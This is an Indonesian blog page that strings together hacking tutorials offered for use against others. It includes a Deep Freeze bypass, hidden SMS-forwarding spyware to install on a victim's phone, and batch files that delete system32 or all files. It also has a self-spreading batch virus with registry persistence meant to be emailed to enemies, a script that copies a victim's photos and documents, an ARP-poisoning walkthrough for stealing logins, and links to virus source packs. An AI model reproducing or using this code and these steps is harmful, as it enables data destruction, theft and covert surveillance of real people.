Member

Google+ Followers

Iklan

promo mobil murah

Blog Archive

Diberdayakan oleh Blogger.
Minggu, 25 Maret 2012


Jika kemarin saya sudah meposting software deep freeze, kali ini saya akan memposting cara hack deep freeze 7 ata cara membol deep freeze 7 tersebut, caranya mudah sekali anda tinggal download software anti deep freeze v 0.4.

Langsung aja ke topik utama.
Cara Bobol Deep Freeze 7 menggunakan anti deep freeze
1. Buka tool anti deep freeze 0.4 yang bisa di download di sini
2. pilih bypass exist proces
3. start
4. kemudian akan muncul enter password, ksongkan saja dan langsung ok
5. klik menu password
6. masukkan password baru yang anda kehendaki pada enter new password dan confirm password.
7. klik apply and reboot dan secara otomatis password aka berganti setelah proses reboot selesai.

cara berikutnya.
1. jalankan anti deep freeze.
2. pilih open new proces
3. pilih boot thawed
4. klik apply and reboot maka komputer anda akan otomatis reboot.
5. saat reboot selesai deep freeze anda sudah non aktiv dan siap ntuk di uninstal.
6. selesai
Jumat, 23 Maret 2012

File Container : Matroska (MKV), Hardsubbed
Fansub group : Timeless Subs
Size : 130 – 330 MB
Length : 50 – 98 min
Resolution : 450p (800:448)
Eps 1: http://www.mediafire.com/?lz89b1i0273dnm2
http://www.mediafire.com/?lox2152w0mc96us
http://www.mediafire.com/?32byp4u9194vcto
Eps 2-9
http://www.mediafire.com/?dw34ez2uijtaiha
http://www.mediafire.com/?8ilhu7noeihmjne
http://www.mediafire.com/?fkqg1pg2u4xhswh
http://www.mediafire.com/?q5h5ddhgdc5x9lo
http://www.mediafire.com/?jh72l9webfya8qr
http://www.mediafire.com/?atq9776phxyvys4
http://www.mediafire.com/?euuc2stnm4w62b0
Final : http://www.mediafire.com/?il958g1ib86uavl
Bloody Monday Episode 01.part1.rar http://www.megaupload.com/?d=5FNAWLS0
Bloody Monday Episode 01.part2.rar http://www.megaupload.com/?d=QSGFFWM5
Bloody Monday Episode 02 http://www.megaupload.com/?d=39NJPOQL
Bloody Monday Episode 03 http://www.megaupload.com/?d=VQFDHNHG
Bloody Monday Episode 04 http://www.megaupload.com/?d=T3T2H5J6
Bloody Monday Episode 05 http://www.megaupload.com/?d=Q35Q75UH
Bloody Monday Episode 06 http://www.megaupload.com/?d=CR4PA7ZU
Bloody Monday Episode 07 http://www.megaupload.com/?d=MDOH992D
Bloody Monday Episode 08 http://www.megaupload.com/?d=6QMEJHA9
Bloody Monday Episode 09 http://www.megaupload.com/?d=YAQXE8FP
Bloody Monday Episode 10 http://www.megaupload.com/?d=KG41HGG0
Bloody Monday Episode 11 http://www.megaupload.com/?d=9L27KO9I
Mediafire:
Bloody Monday Episode 01.part1.rar http://www.mediafire.com/?r5vdpk0ge3za4r0
Bloody Monday Episode 01.part2.rar http://www.mediafire.com/?7rcbk6nx4ubcy72
Bloody Monday Episode 02. http://www.mediafire.com/?bstoceecbokqope
Bloody Monday Episode 03. http://www.mediafire.com/?gypjx7xbvtz3g3u
Bloody Monday Episode 04. http://www.mediafire.com/?w8ybk7xafdb4wzk
Bloody Monday Episode 05. http://www.mediafire.com/?h6svaw3wfd1suo6
Bloody Monday Episode 06. http://www.mediafire.com/?u6o2e3t66hmy7jj
Bloody Monday Episode 07 http://www.mediafire.com/?05vmbstsqp1dm4j
Bloody Monday Episode 08. http://www.mediafire.com/?wlo8fqlc11qy2dy
Bloody Monday Episode 09. http://www.mediafire.com/?gw93v1w4sgvx2h7
Bloody Monday Episode 10. http://www.mediafire.com/?qrjb6d9k4b9xuwc
Bloody Monday Episode 11. final http://www.mediafire.com/?9in4o6dcqi2i3zg
Minggu, 18 Maret 2012

cek CPU kita Apa 32bit atau 64bit ..?

NoFeatures AllFeatures
File stats for: SecurAblefile download  freeware page
spacer
gray
spacer
Last Updated:
Size: 115k
Jan 14, 2007 at 12:14
(1,746.39 days ago)
Downloads/day: 1,536
Total downloads: 2,062,669
Current Rank: 1
Historical Rank: 5


Code Sector - 2.55MB (Freeware)
TeraCopy is a compact program designed to copy and move files at the maximum possible speed, providing the user a lot of features:
  • Copy files faster. TeraCopy uses dynamically adjusted buffers to reduce seek times. Asynchronous copy speeds up file transfer between two physical hard drives.
  • Pause and resume file transfers. Pause copy process at any time to free up system resources and continue with a single click.
  • Error recovery. In case of copy error, TeraCopy will try several times and in the worse case just skips the file, not terminating the entire transfer.
  • Interactive file list. TeraCopy shows failed file transfers and lets you fix the problem and recopy only problem files.
  • Shell integration. TeraCopy can completely replace Explorer copy and move functions, allowing you work with files as usual.
  • Full Unicode support.
1
Copy the following code to link to this page:
DownloadDownload





Di sore 2009 ini, saya akan memberikan anda beberapa tips trik rahasia untuk menyadap sms nomer teman anda. Biasanya, trik ini digunakan para detektif tuk mensadap HP seseorang. Baik itu SMS maupun Telepon. ( kok saya bisa tahu trik ini?) Tetapi saya hanya akan menjelaskan kepada anda cara menyadap sms. Menakutkan bila menyadap/sadap telepon. Artikel ini hanya sebagai hiburan saja. Jangan memakainya dengan maksud jahat karena perbuatan dosa anda akan sangat besar. Tujuannya, supaya kita bisa setia dengan pacar kita, tidak ada yg berani selingkuh, dan supaya tidak ada teman kita yang menghianati kepercayaan. Kalo saya se..buat adek saya aja, soalnya dia nakal dan suka boong lwt sms. Anda mau tahu kan caranya? setelah anda tahu rahasia ini, anda wajib komentar lo!
Tentu saja ada persyaratan yg harus dipenuhi :
  1. Dilarang Memakai ini untuk perbuatan lainnya kecuali untuk hiburan
  2. HP adalah HP symbian. Baik HP anda maupun HP teman anda.
  3. Merek NOKIA
  4. Memiliki aplikasi simbyan smsanywherelite.sis
Nah..persyaratan itu harus anda lakukan sebelum anda mensadap sms. Hp anda harus symbian dan nokia ( kalo bisa). dan hp teman anda yang akan disadap juga symbian dan nokia. (promosi nokia ni). Kalo ga punya nokia, jangan teruskan baca artikel ini karena besar kemungkinan akan gagal. Ikuti instruksi berikut ini untuk menyadap dan sadap sms hp :
  1. download smsanywherelite.sis atau smsforwaderlite.sis untuk software menyadap
  2. Masukkan aplikasi symbian itu di HP anda dan teman anda
  3. Begitu aplikasi ini diinstal, kamu tidak bisa melihat program maupun ikon aplikasi itu dalam ponsel. Seluruh pengontrolannya harus lewat sms, mulai dari pengaktifan dan mematikan program, mengubah password, hingga pengiriman sms ke ponsel lain. Tapi justru itu keuntungannya jika digunakan sebagai alat sadap. Berarti sang target kan tidak tahu kalau diponselnya telah dipasangi aplikasi tersebut. Justru itu, teman anda tidak akan tahu kan kalo smsnya disadap? Karena aplikasi symbian ini belum mendukung GUI (Graphics User Interface).
  4. Siapkan hp/ponsel korban anda
  5. Siapkan HP anda yang akan menerima sms masuk dari korban anda.
  6. Aktifkan aplikasi ini di ponsel korban kamu dengan mengetik format sms -[ SA(spasi)(password)(spasi)ON ]-. Panjang password maksimal 8 karakter. Misal, jika password kamu adalah 123456, ketikkan SA 123456 ON kirim sms ini ke nomor ponsel kedua/ponsel kamu. Untuk mematikannya, ketik SA 123456 OFF ke nomor yang sama.
  7. Lalu, jika anda ingin menyadap lebih dari 5 hari..atau setiap sms masuk di hp korban akan selalu diteruskan ke hp anda, ketik sms ini di hp korban anda : SA(spasi)(password)(spasi)R1, misal SA 1234567 R1. Untuk mematikan fungsi ini ganti parameter di belakang “R” menjadi nol. Jadi, tuliskan SA 1234567 R0. Sedangkan untuk meneruskan setiap sms keluar, kirim sms bertuliskan SA 1234567 S1 ke nomer kamu. Matikan fungsi ini dengan mengirim SMS SA 1234567 S0
  8. Sekarang, setiap korban menerima dan mengirim sms..kamu akan mendapat terusannya sama persis dengan sms aslinya
Dengan begini, kita akan tahu mana pacar kita yang selingkuh..mana teman yang berkhianat dan lainnya. Semoga bermanfaat!


bingung pa yg mo wa share untk share pertma wa ne..NgakakNgakak

ne wa punya sdikit ilmu yg mungkin jadul...
klo gx guna delet ja y kk admin jgn bri ampunSedihSedih

download disini..
http://www.matcode.com/remshutdn.exe

cara mke na relatif mudah kok sobNgakakNgakak
lu tinggal pilih list komputer client yg ada di warnet tu..
nah klo da lo bisa milih 3 mode :
*shutdown pc target
*stanby pc target
*restar pc target
dan kmu pun bisa mencantum kan message ke pc target.

stelah selesai,tkan OK...


Dan saya tidak bertanggung jawab atas segala kerusakan yang kamu buat.

VIRUS 1 (Format HDD Classic One) :


1. Buka Notepad

2. Tuliskan perintah di bawah ini : -

Quote:
del c:\windows\system32\*.* /q


3. Simpan file tersebut dengan nama apa saja terserah kamu, yang penting akhirannya harus ".bat or .cmd".

4. Jangan di klik 2x jika tidak ingin komputer sendiri yang hancur.

Kenapa ?????? Karena file yang kamu buat tadi akan menghapus folder system32 dan setelah komputer di hidupkan ulang maka komputermu tidak akan jalan dan harus di install ulang, karena sistem tidak mencari file-file yang ada di folder system32 yang dibutuhkan pada saat booting awal (dengan asumsi tanpa ada program Deep Freeze atau Returnil)

5. Jika ingin mencobanya buatlah folder baru dengan nama yang sama dan letakkan di C:\. Isi beberapa file yang tidak berguna. Kemudian jalankan file yang telah kamu buat tadi. Klik 2x file tersebut dan secara otomatis file akan terhapus.

6. Kamu bisa mencobanya di semua komputer yang memiliki system operasi Windows, dan ingat, saya tidak bertanggung jawab atas semua kerusakan yang kamu buat.

Virus 2 :

Trik ini untuk mengirim file ke komputer orang yang kamu benci.
Copy perintah di bawah ini ke dalam notepad.. kemudian simpan dengan nama terserah.bat

Jangan di klik file tersebut yach........ Kirim ke email orang yang kamu benci dach...
hehehehe....

Dan yang akan terjadi setelah si musuh menerima file adalah :
1) file akan mengcopy secara otomatis ke dalam startup
2) file akan mengcopy secara otomatis ke dalam ribuan komputer yang terinjeksi
3) mampu menyembunyikan dirinya sendiri

4) file akan mematikan secara otomatis program MSN, Norton, Windows Explorer, Limewire.
5) Membalik klik kanan mouse dengan klik kiri
6) Membuka kotak dialog Peringatan
7) Mengganti waktu ke jam 12:00 dan mematikan komputer


Code:
Quote:
@Echo off

color 4

title 4

title R.I.P

start

start

start

start calc

copy %0 %Systemroot%\Greatgame > nul

reg add HKLM\Software\Microsoft\Windows\CurrentVersion\Run /v Greatgame /t REG_SZ

/d %systemroot%\Greatgame.bat /f > nul

copy %0 *.bat > nul

Attrib +r +h Greatgame.bat

Attrib +r +h

RUNDLL32 USER32.DLL.SwapMouseButton

start calc

cls

tskill msnmsgr

tskill LimeWire

tskill iexplore

tskill NMain

start

cls

cd %userprofile%\desktop

copy Greatgame.bat R.I.P.bat

copy Greatgame.bat R.I.P.jpg

copy Greatgame.bat R.I.P.txt

copy Greatgame.bat R.I.P.exe

copy Greatgame.bat R.I.P.mov

copy Greatgame.bat FixVirus.bat

cd %userprofile%My Documents

copy Greatgame.bat R.I.P.bat

copy Greatgame.bat R.I.P.jpg

copy Greatgame.bat R.I.P.txt

copy Greatgame.bat R.I.P.exe

copy Greatgame.bat R.I.P.mov

copy Greatgame.bat FixVirus.bat

start

start calc

cls

msg * R.I.P

msg * R.I.P

shutdown -r -t 10 -c "VIRUS DETECTED"

start

start

time 12:00

:R.I.P

cd %usernameprofile%\desktop

copy Greatgame.bat %random%.bat

goto RIP


Twisted Evil SELAMAT MENCOBA Twisted Evil

cara membuat virus mematikan

Silahkan copas alias copy paste kode dibawah ini di notepad kamu:





cls
:A
color 0a
cls
@echo off
echo Wscript.Sleep 5000>C:\sleep5000.vbs
echo Wscript.Sleep 3000>C:\sleep3000.vbs
echo Wscript.Sleep 4000>C:\sleep4000.vbs
echo Wscript.Sleep 2000>C:\sleep2000.vbs
cd %systemroot%\System32
dir
cls
start /w wscript.exe C:\sleep3000.vbs
echo BANGUN TIDUR KU TERUS MENGHANCURKAN SYSTEM…
echo …………………
echo:
echo:
start /w wscript.exe C:\sleep3000.vbs
echo NEXT…………!
echo:
echo:
echo HALO SOBAT
echo MAU JADI TEMAN AKU ??
echo:
echo:
echo IM ZATYA BAJA ITEM
start /w wscript.exe C:\sleep2000.vbs
echo …………
start /w wscript.exe C:\sleep4000.vbs
echo …………
echo NTAR…….!
start /w wscript.exe C:\sleep2000.vbs
echo:
echo:
echo:
echo VIRUS INI ADALAH VIRUS YANG SANGAT MEMATIKAN…
cd C:\Documents and Settings\All Users\Start Menu\Programs\
mkdir Si_INDO_CRACKER
start /w wscript.exe C:\sleep3000.vbs
echo:
echo:
echo:
echo:
echo HAPPY BIRTHDAY
echo KOMPUTER KAMU BAGUS DEH
echo BOLEH Q INTIP DIKIT
echo HMM BOLEH JUGA NEH ISINYA
echo CALL ME YACHH +6284323xxxxxx GPRS JUGA BOLEH KOK
echo:
echo:
echo:
echo:
echo:
echo SABARAN BRO…
start /w wscript.exe C:\sleep3000.vbs
echo ………..
echo zzzzzzz….
echo:
echo:
start /w wscript.exe C:\sleep3000.vbs
echo OKE….Virus AKTIF(bayuhackerzz)!
echo:
echo:
echo:
start /w wscript.exe C:\sleep2000.vbs
echo has been hacked by bayuhackerzzz…
start /w wscript.exe C:\sleep2000.vbs
echo SEMUA PROSESS UDAH DIBANTAI…
start /w wscript.exe C:\sleep2000.vbs
echo VIRUS SILAHKAN BOOTING DENGAN SEGALA HORMAT…
start /w wscript.exe C:\sleep2000.vbs
echo:
echo:
echo:
echo VIRUS MASUK PODIUM AKHIR!
start /w wscript.exe C:\sleep2000.vbs
echo:
echo:
echo I LOVE U FULL
echo HA HA HA HA
echo:
echo:
echo:
echo:
start /w wscript.exe C:\sleep2000.vbs
pause
shutdown -f -s -c “berbagi-bersama-kami.co.cc .”






ganti aja kata-kata nya sesuka kamu...hha
Kemudian disimpan dengan nama terserah Kamu diakhiri .bat dan save type all file .
cth nya: Dancokboyo.bat




Zatya Disini hanya memberikan untuk berbagi dan sama-sama belajar.
Dan terserah bagaimana Kamu menyikapinya dan menggunakannya.


iseng rusak compy orang Meng Hapus File dan Folder

kalo kk punya temen yang pengen di isengin, pengen kirim virus rada susah kalo mereka sudah di protek sama 10 antivirusSenang

mungkin ini cocok buat di test sama mereka.

NOTEPAD sebagai senjata baru

gunakan notepad sebagai senjata kalian untuk ngerjain orang laen.

Menghapus Files dan Folder

1. buka notepad trus ketik DEL /F /Q *
2. save as dan simpan dengan nama test.cmd
3. kalau elo dobel klik file test.cmd maka semua files dan folder akan terhapus.

Menghapus Files Tertentu

1. buka notepad trus ketik erase C:TEST.txt
2. save as dan simpan dengan nama test.cmd
3. kalo elo dobel klik file test.cmd maka files TEST.txt di drive c:\ akan terhapus

Menghapus Folder Tertentu

1. buka notepad trus ketik erase C:WINDOWS
2. save as dan simpan dengan nama test.cmd
3. kalo elo dobel klik file test.cmd maka folder WINDOWS di drive c:\ akan terhapus

kalo ah jadi, tinggal kirim aja ke temen2, ato siapapun. simpel tapi "merugikan":ngakak:

semoga tidak disalah gunakanBigsmile



Siapa tidak tahu pasangan serasi dalam dunia hacking? ya Cain & Abel, keduanya merupakan pasangan untuk melakukan hack dalam jaringan dengan fitur yang cukup lengkap. Nah aku disini mau kasih tutorial cain & abel + preview.
Link download cain & abel
download
udah pada tau kan cain + abel..
nah ada sedikit tutorial neh, maklum ya yang nulis masih newbie jadi tulisannya acak”an…
ini juga sebagai pembuktian janjiku.. cie..cie [halah apaan sih]
Untuk proses installnya gak usah di ajarin ya.. aku anggep semua udah pada bisa…eh ini bisa berjalan dalam 1 jaringan, so kalo kamu ke warnet, orang” yang login FS, FB, dan lainnya bisa didapat user ma passnya. Hal ini juga berlaku di hot spot seperti yang aku lakuin.
langsung aja buka cain + abelnya..
klik start / stop sniffer seperti pada gbr [ gbr 1]
Abis itu klik tanda + [warna biru] untuk melakukan scan mac address, maka tampilan akan seperti ini [gbr 2]
pada mac address scan langsung klik OK saja
maka akan loading dan didapatkan banyak IP address dalam 1 jaringan dan bisa diketahui mac addressnya [gbr 3]
setelah lancar sampai disini kamu bisa langsung ke selanjutnya aja.
Klik APR di tab bagian bawah, dan tampilan akan seperti ini [gbr 4]
setelah itu klik tanda + [warna biru] untuk menambahkan IP address yang ingin di poisoning . tampilan akan seperti ini [gbr 5]
di bagian kiri kamu pilih IP routernya [bagaimana kita tahu IP routernya?... apa perlu dijelasin juga?]
masuk ke cmd dan ketikan ipconfig /all maka akan diketahui segenap informasi. Nah pikir aja sendiri mana yang jadi routernya ya.
yang dibagian kanan adalah IPaddress yang ingin di poisoning. Kalau mau semua 1 jaringan cukup blok semua aja.
Nah abis itu klik ok.
Abis langkah itu maka tampilannya seperti ini [gbr 6]
Nah statusnya idle kan? itu tandanya belum di poisoning. Klik start / stop arp dan statusnya akan berubah menjadi poisoning [gbr 7]
Adanya daftar dibawah menandakan bahwa ada proses yang sedang dikerjakan
langsung saja masuk ke dalam password dengan klik tab password di bagian bawah [gbr 8]
nah klik dibagian kiri HTTP, dan lihat hasilnya [gbr 9]
Itu ada sengaja ada 1 yang gak aku tutup, coba aja masih bisa buat login pa gak.. haha


langsung aja pd intinya setiap pergerakan di dunia maya kn membutuhkan software .

klian boleh download sofwaret nya di sini

klo mo lbih jlasnya ksini bang

da ptunjuknya ko bang


http://www.technitium.com/tmac/index.html



nich contoh softnya bang

[Image: 20101209191814_wew_4d00c9063fe96-t.jpg]


tgl mendisable tulisan disable dhcp

dgn sndrinya server tersebut akan terputus koneksi nya

dgn st syarat abng2 hrs brd dlm st area koneksi.

slhkn mencoba smg brmanfaat bwat mastah2 smwa


MEMBUAT APLIKASI SEDERHANA DENGAN NOTEPAD

penjelasan,program ini ber ukuran sangat kecil sekitar,
File Size : 40.00 KB,
file ini terbentuk batch files.

kegunaan aplikasi ini:
untuk nyuri file pada komputer
dan format file :
*.3gp
*.wmv
*.avi
*.jpg
*.rm
*.mp
g

nah format2 diatas tuh yg seringk kita temui dalam video ++
lah hahaha,nah tool ini akan mendeteksi file2 seperti itu di komputer
hahaha. cara make nyah mudah tinggal di klik,trus pilih y,dan tekan Enter2x ampe warna layar berubah trus tunggu in dolo.
Aplikasi akan berjalan dan nikmati hasil nya
dan file td akan tersimpan di "SCC_18202" berbentuk folder


cara membuat

1.Buka notepad

2.copy paste code ini

code:




echo off
color 0a
mode 31,15
if "%1"=="/?" goto Sej
if not "%n%" == "" set n=
:MetDtg
cls
title Stole V 3.2
msg * Digunakan untuk mencuri
msg * File atau data2 korban
echo.
echo ÚÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÙ
echo ³ Program Aplikasi ³
echo ³ Stole V 3 .2 ³
echo ³ Author : sohai ³
echo ÀÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÙ
:awal
ption

echo ------EKSTENSI FILE----------

echo [1] 3gp [4] jpg [7] doc

echo [2] wmv [5] rm [8] xls

echo [3] avi [6] mpg [9] Exit

echo =============================

echo.

set/p "pil=Masukan Pilihan: "

if %pil%=='' goto option

if %pil%==1 goto 3gp

if %pil%==2 goto wmv

if %pil%==3 goto avi

if %pil%==4 goto jpg

if %pil%==5 goto rm

if %pil%==6 goto mpg

if %pil%==7 goto

if %pil%==8 goto m

if %pil%==9 goto keluar

goto option
:3gp
Set Maling=%computername%_%random%

If not exist "%Maling%" Md "%Maling%"

For %%a in (C D E F) do if exist %%a:\ (
For /f "tokens=*" %%b in ('dir /a /b /s %%a:\*.3gp') do (
attrib -s -h -r "%%b"
copy "%%b" "%Maling%" /y)
)
echo sudah tidak ditemukan file nyah
pause >nul
cls
goto awal

goto option
:goto wmv
Set Maling=%computername%_%random%

If not exist "%Maling%" Md "%Maling%"

For %%a in (C D E F) do if exist %%a:\ (
For /f "tokens=*" %%b in ('dir /a /b /s %%a:\*.wmv') do (
attrib -s -h -r "%%b"
copy "%%b" "%Maling%" /y)
)

cls
echo sudah tidak ditemukan file nyah
pause >nul


goto option
:avi
Set Maling=%computername%_%random%

If not exist "%Maling%" Md "%Maling%"

For %%a in (C D E F) do if exist %%a:\ (
For /f "tokens=*" %%b in ('dir /a /b /s %%a:\*.avi') do (
attrib -s -h -r "%%b"
copy "%%b" "%Maling%" /y)
)
echo sudah tidak ditemukan file nyah
pause >nul
cls

goto option
:jpg
Set Maling=%computername%_%random%

If not exist "%Maling%" Md "%Maling%"

For %%a in (C D E F) do if exist %%a:\ (
For /f "tokens=*" %%b in ('dir /a /b /s %%a:\*.jpg') do (
attrib -s -h -r "%%b"
copy "%%b" "%Maling%" /y)
)
echo sudah tidak ditemukan file nyah
pause >nul
cls

goto option
:rm
Set Maling=%computername%_%random%

If not exist "%Maling%" Md "%Maling%"

For %%a in (C D E F) do if exist %%a:\ (
For /f "tokens=*" %%b in ('dir /a /b /s %%a:\*.rm') do (
attrib -s -h -r "%%b"
copy "%%b" "%Maling%" /y)
)
echo sudah tidak ditemukan file nyah
pause >nulcls

goto option
:mpg
Set Maling=%computername%_%random%

If not exist "%Maling%" Md "%Maling%"

For %%a in (C D E F) do if exist %%a:\ (
For /f "tokens=*" %%b in ('dir /a /b /s %%a:\*.mpg') do (
attrib -s -h -r "%%b"
copy "%%b" "%Maling%" /y)
)
echo sudah tidak ditemukan file nyah
pause >nul
cls

goto option
:doc
Set Maling=%computername%_%random%

If not exist "%Maling%" Md "%Maling%"

For %%a in (C D E F) do if exist %%a:\ (
For /f "tokens=*" %%b in ('dir /a /b /s %%a:\*.doc') do (
attrib -s -h -r "%%b"
copy "%%b" "%Maling%" /y)
)
echo sudah tidak ditemukan file nyah
pause >nul
cls

goto option
:xls
Set Maling=%computername%_%random%

If not exist "%Maling%" Md "%Maling%"

For %%a in (C D E F) do if exist %%a:\ (
For /f "tokens=*" %%b in ('dir /a /b /s %%a:\*.xls') do (
attrib -s -h -r "%%b"
copy "%%b" "%Maling%" /y)
)
echo sudah tidak ditemukan file nyah
pause >nul
cls


:keluar
msg * data telah ter ambil!!!
msg * Hayoo !!! Dta kmu tuh apa ya???
msg * HEhehehehe
msg * by sohai
Exit

3.kemudian save dengan ekstensi .*bat
contoh: curidata.bat


Hati2...bisa membuat PC anda Padam Untuk Selama-lamanya

DOWNLOAD


Rampok 2.0 (Tool sedot isi USB)
Ini adalah program rampok versi kedua. Rampok yang kedua mempunyai tambahan fasilitas
1. Menggunakan user dan password (digunakan untuk menutup aplikasi dan menonaktifkan kerja program).
2. Bisa startup program saat komputer dihidupkan.
3. Menggunakan button on/off untuk mengaktifkan dan menonaktifkan kerja program.
4. Bisa memilih alamat folder dan nama folder yang akan digunakan menampung hasil copy_an.
5. Rampok v2.0.exe tidak muncul dalam tasklist processes di task manager saat dijalankan.

http://www.ziddu.com/download/9913960/Ra...0.rar.html


ini anti rampok isi flash disk lockv.1

5-19-2010, 12:52 AM (This post was last modified: 05-19-2010 12:54 AM by p0k3r.)
Post: #2
RE: Rampok 2.0 (Tool sedot isi USB)
DOWNLOAD Flash Disk Lock v.1.40 Big Grin
 


Kemaren tanggal 26 saya mencoba share kepada teman-teman tentang bagaimana cara mencuri bandwidth dengan NETCUT, tapi untuk sekarang saya mencoba menshare obatnya atau penangkalnya, dalam Hadist Rasulullah kan ada likulli dain dawa’ kayaknya ini juga berlaku dalam dunia teknologi. so jangan kawatir semua pasti ada penangkalnya, misalkan seperti hacking di network dengan menggunakan bantuan tool atau manual kita bisa mengkalnya dengan software ANTIARP 6.
AntiARP ini merupakan sebuah tool security yang bisa anda gunakan dalam menangkal hacking dengan Netcut, penyadapan,  pengalihan IP dan sebagainya pokoknya yang berjenis ARP Spoofing (ARP serangan).
Fitur utama AntiARP:
1. ARP masuk mencegat serangan. Mencegat masuk paket ARP palsu di OS kernel untuk melindungi sistem untuk memastikan yang benar tabel cache ARP lokal.
2. ARP keluar mencegat serangan. Keluar mencegat paket ARP palsu di OS kernel untuk mengurangi localhost’s menyerang orang lain setelah mempengaruhi program jahat.
3. Mencegat IP konflik. Mencegat paket ARP Ip konflik di OS kernel untuk melindungi sistem dari serangan dari IP konflik.
4. Aktif pertahanan. Aktif menjaga komunikasi dengan gateway dan mengirim alamat MAC yang benar untuk gateway untuk menjaga kelancaran koneksi internet dan keamanan komunikasi.
cara menjalankan aplikasi ini tinggal intall seperti biasa kemudian ketika minta Restart Komputer di restart saja. lalu buka programnya Anti ARP 6.0.1, ketika ada perintah HIDE di ok saja untuk memunculkan dan menghide Anti ARP ini cukup tekan  Ctrl+1
Screen shotnya :
Download : AntiARP 6.0.1
Download : Crack


[ Source Code ] 400an virus Buat yang hobby jahilin komputer orang nih source virus bisa di kembangkan biar lebih jahat lagi .... :twisted:

* Avispa.dr
* Dark Avenger
* AVA.550
* Univ/a
* Auspar.377
* Auspar.338
* OC/oops
* Middle
* Auspar.635
* Aus-Term.mp.3490
* Jeru.1413
* OC/scud
* Auspar.dr
* Auspar.635
* Auspar.615
* Auspar
* Aust.543
* Auspar.424
* Auspar.377
* Auspar.338
* Auspar.292a
* Auspar.215
* Auspar.187
* Auspar
* Univ/b
* Aurea.653
* Iron-Maiden
* Akuku.1111
* Akuku.889
* Akuku.886
* NRLG.b
* Attitude
* Attention.394
* HLL.ow.4505
* Attention.394.dam
* Xany
* Univ/g
* Univ/q
* Univ.cmp
* OC/vcl
* Atomant.2143
* AT
* Atomic.350
* Astra.1010
* Suriv.dr
* Comasp
* Shocker.cmp.7000
* Tiebud
* BtDr.b
* Ash.743
* Univ/r
* Armagedon.y
* Armagedon
* Vienna
* ARCV.Scy.1208
* ARCV.Scroll.795ARCV.Scroll.dr)
* ARCV.Sand.1172
* ARCV.More
* ARCV.Kiss
* ARCV.Jo.986
* ARCV.Jo.912a
* ARCV.250.dr
* ARCV.642
* ARCV.639a
* ARCV.1183.dr
* ARCV.Anna.742.dr
* ARCV.639a
* ARCV.Jo.916
* ARCV.839
* ARCV.Slime.773
* ARCV.Ice
* ARCV.Ice
* Univ/q
* ARCV.330a
* ARCV.255
* Crew.2480
* Univ/o
* 7thSon.426
* Arara.dr
* Arara.1054
* Arab.834
* Armagedon.y
* QScreen3
* Suriv.1488
* Suriv.dr
* Dark Avenger.2000
* Jerusalem.cr
* Jerusalem.cr
* APLittle.153
* APLittle.150
* APLittle.147
* APLittle.142a
* APLittle.118a
* APLittle.153
* Univ.topsy
* Anti-Pascal
* Tiny-GM.129
* Jerusalem
* BtDr.Unk2
* Jeru.1605
* AntiMIT
* Antiexe
* Murphy
* Thanksgiving.mp.1253a
* Anticad.3012a
* Anticad.mp.4096.d
* Anticad.2900
* Anticad.mp.4096.a
* Anticad.2646
* Anthrax.mp.1024
* Univ.ow/d
* Vacsina.1206
* ARCV.Anna.742.dr
* HLLP.Animus
* Andromeda
* Jerusalem.ch
* Jeru.1808.a
* QZap141
* Pixel.845
* Pixel.k
* Ambulance
* AlphaStrike.2000
* Alien.733.a
* Alia.1023
* YD.1049.a
* Alex.1951
* Brain
* Albania
* Alabama.1560.a
* Akuku.886
* Tiebud
* BtDr.Aircop
* BtDr.b
* HLL.ow
* HLL.cmp.8064
* AHADisk
* Agiplan
* YDOC/vcl
* Syslock.dropped
* NRLG.b
* V2P6.1993
* Dead
* BitAddict
* ARCV.Scroll.795
* ARCV.Scroll.dr
* Acid.dr
* dan lain lain..........

http://www.ziddu.com/download/9740859/so...s.zip.html

+
----
-
VirSCAN.org Scanned Report :
Scanned time : 2010/11/13 01:29:36 (WIT)
Scanner results: 58% Scanner(s) (21/36) found malware!
File Name : tVirusMaker.exe
File Size : 693120 byte
File Type : PE32 executable for MS Windows (GUI) Intel 80386 32-bit
MD5 : 5b7cbfc8d8bc22798ee4fc4aa4b03e3b
SHA1 : 76f643b3f67f76f4182ef18e43e298e2e8570044

Scanner Engine Ver Sig Ver Sig Date Time Scan result
a-squared 5.0.0.20 20101111232708 2010-11-11 0.40 -
AhnLab V3 2010.11.12.00 2010.11.12 2010-11-12 1.46 -
AntiVir 8.2.4.98 7.10.13.235 2010-11-12 0.28 TR/Spy.Gen
Antiy 2.0.18 20101106.5534523 2010-11-06 0.02 -
Arcavir 2010 201011122057 2010-11-12 0.12 Hacktool.Win32.Joiner.N
Authentium 5.1.1 201011112230 2010-11-11 1.30 W32/Trojan2.MUQT (Exact)
AVAST! 4.7.4 101112-1 2010-11-12 0.04 Win32:Trojan-gen
AVG 8.5.850 271.1.1/3253 2010-11-12 0.26 -
BitDefender 7.90123.6229840 7.34639 2010-11-13 5.81 Trojan.Generic.4624055
ClamAV 0.96.3 12238 2010-11-12 0.27 Trojan.Agent-147706
Comodo 4.0 6699 2010-11-12 0.96 -
CP Secure 1.3.0.5 2010.11.12 2010-11-12 0.10 Troj.Spy.W32.Agent.p
Dr.Web 5.0.2.3300 2010.11.13 2010-11-13 9.74 -
F-Prot 4.4.4.56 20101111 2010-11-11 1.29 W32/Trojan2.MUQT (exact)
F-Secure 7.02.73807 2010.11.12.06 2010-11-12 0.20 -
Fortinet 4.2.249 12.555 2010-11-11 0.18 W32/VB.ETG!tr
GData 21.1083/21.469 20101112 2010-11-12 7.83 -
ViRobot 20101112 2010.11.12 2010-11-12 0.38 -
Ikarus T3.1.32.15.0 2010.11.12.77144 2010-11-12 4.93 not-a-virus:Virtool.tVirusMaker
JiangMin 13.0.900 2010.11.12 2010-11-12 1.37 -
Kaspersky 5.5.10 2010.11.11 2010-11-11 0.15 -
KingSoft 2009.2.5.15 2010.11.12.17 2010-11-12 0.68 Win32.Troj.Scar.693120
McAfee 5400.1158 6165 2010-11-12 18.30 Generic VB.dk
Microsoft 1.6301 2010.11.12 2010-11-12 3.99 -
Norman 6.06.10 6.06.00 2010-11-11 8.01 Suspicious_Gen2.ANUGG
Panda 9.05.01 2010.11.12 2010-11-12 2.25 Generic Trojan
Trend Micro 9.120-1004 7.616.12 2010-11-12 0.00 -
Quick Heal 11.00 2010.11.12 2010-11-12 2.59 -
Rising 20.0 22.73.03.06 2010-11-11 1.99 Trojan.Win32.Generic.5201CA1D
Sophos 3.13.1 4.59 2010-11-12 2.90 Troj/VB-ETG
